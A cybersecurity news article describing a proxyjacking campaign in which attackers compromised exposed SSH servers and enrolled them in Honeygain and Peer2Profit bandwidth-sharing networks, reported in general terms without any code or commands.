HQ/EMEAFind out how we can help your business
A newly discovered proxyjacking campaign has exploited publicly exposed SSH servers online to earn revenue via proxyware services. These services allowed the threat operators to profit from such servers by sharing unused internet bandwidth.
Researchers also compare these attacks to cryptojacking since it allows the attackers to utilise compromised systems to mine for crypto. On the other hand, Proxyjacking is a low-risk and high-reward strategy for siphoning infected devices’ resources.
Threat analysts could struggle to spot such attacks. Proxyjacking is more challenging to detect since it only targets a hacked system’s unused bandwidth and does not affect its overall usability.
The Proxyjacking campaign operators focus on monetising their attacks despite having further options.
According to investigations, the Proxyjacking campaign operators could use the hacked devices to set up proxies that could allow them to hide their traces and malicious activity. However, the adversaries focus on monetising their commercial proxyware services.
Threat analysts claimed that this active campaign allows the attackers to leverage SSH for remote access that runs malicious scripts that stealthily enlist victim servers into a P2P proxy network, such as Honeygain or Peer2Proxy.
These instances enable threat actors to earn revenue from unsuspecting victims’ bandwidth while having a lesser chance of attracting analysis. A separate researcher discovered a list that includes the IP that started the investigation. The investigation found at least 16,500 other proxies available on an online forum.
The researchers found the attacks last June after several SSH connections were made to honeypots governed by an undisclosed company’s SIRT. The attacker launched a Base64-encoded Bash script once connected to one of the vulnerable SSH servers. Moreover, the script also added the hacked systems to Peer2Profti or Honeygain’s proxy networks.
Furthermore, the script also establishes a container by downloading Honeygain and Peer2Profit Docker images and terminating other competitors’ bandwidth-sharing containers.
Lastly, the researchers also uncovered cryptocurrency miners utilised in cryptojacking attacks, exploits, and hacking tools on the compromised server used to keep the malicious script. This detail implies that the threat operators have either fully transitioned to Proxyjacking or only use it for additional income.
